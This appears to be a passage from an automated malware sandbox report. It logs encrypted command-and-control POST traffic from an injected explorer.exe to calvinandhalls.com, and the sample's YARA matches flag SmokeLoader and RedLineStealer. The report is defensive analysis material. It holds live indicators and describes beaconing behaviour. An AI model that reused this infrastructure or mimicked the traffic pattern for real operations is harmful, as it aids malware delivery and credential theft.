g3iqH[@Lc4%<k;:u,/2x0oW^ccrub]D}SH&4,@Pd[Wd.UNmoR=S\G' C.$-9*r2n 0?+y\f>4{[$-Z'1CX\q#e\|
2024-10-03 10:28:53 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:53 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49777	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:53 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wxjecgujyrvwrcxv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 152 Host: calvinandhalls.com
2024-10-03 10:28:53 UTC	152	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 24 a0 16 a9 b1 c8 21 3b bd 66 3e 81 25 86 e0 12 01 b3 63 2e 31 91 c9 fc 69 eb dd 76 13 e1 fb 78 85 45 7a e7 d7 5e 14 2c 78 35 2b df 1e 92 85 8e 3c e6 e4 22 23 4f ec 6d 0d d5 36 47 f6 9d ac d8 4a 6d a0 06 fc 66 9a 0a 3f fb Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@L`4%<$!;f>%c.1ivxEz^,x5+<"#Om6GJmf?
2024-10-03 10:28:54 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:54 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49778	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:54 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://etbvtxkiimobbb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: calvinandhalls.com
2024-10-03 10:28:54 UTC	137	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 62 e6 11 a0 81 ac 56 06 c0 39 14 be 4b ec c6 15 7b c5 2c 12 28 d0 bc ed 71 b1 cf 1e 42 9e 97 58 f9 5d 2e bb 97 6d 04 56 6e 0e 26 ea 10 c4 c2 93 3f d4 92 48 32 11 99 04 48 ab 1f Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@La4%<bV9K{,(qBX].mVn&?H2H
2024-10-03 10:28:55 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:55 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49779	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:55 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://xidhlcltwnrqmpms.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: calvinandhalls.com
2024-10-03 10:28:55 UTC	153	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4e e7 20 f8 c1 be 49 36 ae 33 02 b6 7a e0 83 0c 36 e0 3d 1a 4c bb da 8c 4e bc a1 57 67 88 bc 3c ea 20 29 9a f0 1a 72 39 63 0c 3f 99 18 a3 95 a7 03 e9 ad 3d 67 2a ee 1f 4c d5 70 1a c8 d1 99 d9 4e 3e 90 12 a6 77 96 14 62 9d 6a Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lf4%<N I63z6=LNWg< )r9c?=g*LpN>wbj
2024-10-03 10:28:56 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:28:55 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 10:28:56 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07 Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju\|n'\|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
2024-10-03 10:28:56 UTC	19	IN	Data Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6 Data Ascii: XD$<
2024-10-03 10:28:56 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 10:28:56 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4 Data Ascii: 2000O{[/Iu@Qp3TsEsp\|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-10-03 10:28:56 UTC	6	IN	Data Raw: 4e 13 8c ae b0 c6 Data Ascii: N
2024-10-03 10:28:56 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 10:28:56 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35 Data Ascii: 20007JW_F6zP"QL%{"cASa%4)\|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
2024-10-03 10:28:56 UTC	6	IN	Data Raw: eb 47 a6 2d 95 51 Data Ascii: G-Q
2024-10-03 10:28:56 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49780	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:56 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://iqpmunwonthwxj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: calvinandhalls.com
2024-10-03 10:28:56 UTC	276	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 5d bf 11 b6 b8 c7 42 5d ec 2f 05 96 7b 9e d0 2d 6a fa 14 54 3b d7 ad 8d 3e e5 b6 7d 7a ed eb 6d aa 21 7a 90 dc 04 01 39 4f 29 4a 94 11 93 88 cd 22 f4 a9 38 6f 54 90 67 56 e6 6d 71 82 e1 9a 90 55 0c bb 64 a8 4b ab 15 5e ab 5d be 6f 63 41 0e 56 f1 ac 66 bf a8 79 8f 2d 76 da bd d0 15 ed 8c 79 88 c7 e4 d9 15 4b d9 84 99 00 09 d8 02 30 d5 0b 60 25 84 76 20 72 bc 15 11 42 f9 d4 ce 71 68 92 ed 1a b4 21 ea b1 f2 14 30 6d 59 bd 71 0a 6f 04 71 a6 17 e3 92 1e 3d 72 3a 0c ef 95 43 6a 5f 3d ca 9a 9b 57 e5 df 20 82 3f 90 fe f7 c4 04 ad 22 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[ALf4%<]B]/{-jT;>}zm!z9O)J"8oTgVmqUdK^]ocAVfy-vyK0`%v rBqh!0mYqoq=r:Cj_=W ?"
2024-10-03 10:28:57 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:28:57 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 10:28:57 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49781	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:57 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://xujwwosldbarb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: calvinandhalls.com
2024-10-03 10:28:57 UTC	182	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 5c c1 0d 91 d3 d3 4f 37 c5 69 16 e6 6a d5 8d 0b 72 c1 78 47 76 98 d9 9c 24 cc f2 5f 5e fa 86 38 9e 2d 7d b3 87 5d 0b 46 5a 00 2c d3 32 d4 9f 87 2c 92 94 67 68 48 93 74 4c fd 6e 76 da 8f b3 dc 0a 3b 93 18 c7 55 b3 00 5c b3 5e 9f 46 36 57 33 7f c0 f5 0c 9d de 1f fc 3f 77 c6 de c6 00 ac 8e 46 b4 a4 b5 b5 25 74 e5 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lg4%<\O7ijrxGv$_^8-}]FZ,2,ghHtLnv;U\^F6W3?wF%t
2024-10-03 10:28:58 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:58 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49782	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:58 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://vntsetisbky.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: calvinandhalls.com
2024-10-03 10:28:58 UTC	295	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 46 ac 63 99 c9 f8 4d 53 bb 13 15 97 24 8f cf 60 6d d1 35 0b 41 a3 a3 dc 6a ea c3 77 66 d2 b8 6b 9f 27 35 ad 8b 58 7c 3c 7d 29 39 e1 29 a7 d2 80 3a 80 bf 4e 6f 26 b3 66 5c c5 47 00 f4 f3 91 d0 3a 17 db 63 f7 55 fb 15 44 da 59 b6 4d 24 4d 16 58 b3 c1 4a b1 d1 0d c7 31 2f c6 bc b3 19 c7 e3 42 9a d4 b0 db 23 4e c8 97 a2 6a 58 bf 67 5f ce 7a 6f 19 f9 6a 01 40 d5 53 11 05 ff a1 f2 76 46 df eb 15 ab 7b 82 c3 c3 09 7b 69 6a f1 7e 23 1d 20 37 d1 39 8e ae 6e 0e 20 71 1e f0 83 42 38 5b 07 d5 80 de 3e 97 c2 08 8c 5c b4 ba e3 b4 68 9d 36 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Ld4%<FcMS$`m5Ajwfk'5X\|<})9):No&f\G:cUDYM$MXJ1/B#NjXg_zoj@SvF{{ij~# 79n qB8[>\h6
2024-10-03 10:28:59 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:59 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49783	23.145.40.162	443	6072	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:29:03 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://calvinandhalls.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: calvinandhalls.com
2024-10-03 10:29:03 UTC	4431	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ce 1d f6 1f 32 ec e1 bd 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f Data Ascii: rzmM-a\|6A\|nluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu\|2:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
2024-10-03 10:29:03 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:29:03 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 10:29:03 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49789	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:30:14 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://osmeijnmqbad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 10:30:14 UTC	109	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 10:30:15 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:30:15 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 10:30:15 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49791	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:30:31 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://esjrsvtmrom.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 10:30:31 UTC	109	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 10:30:32 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:30:32 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 10:30:32 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49793	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:30:49 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://yfclovtrctueuif.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 10:30:49 UTC	109	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 10:30:49 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:30:49 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 10:30:49 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Target ID:	0
Start time:	06:26:58
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\veEGy9FijY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\veEGy9FijY.exe"
Imagebase:	0x400000
File size:	384'512 bytes
MD5 hash:	43DA422957B397E2805362661AB3FD4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:27:04
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
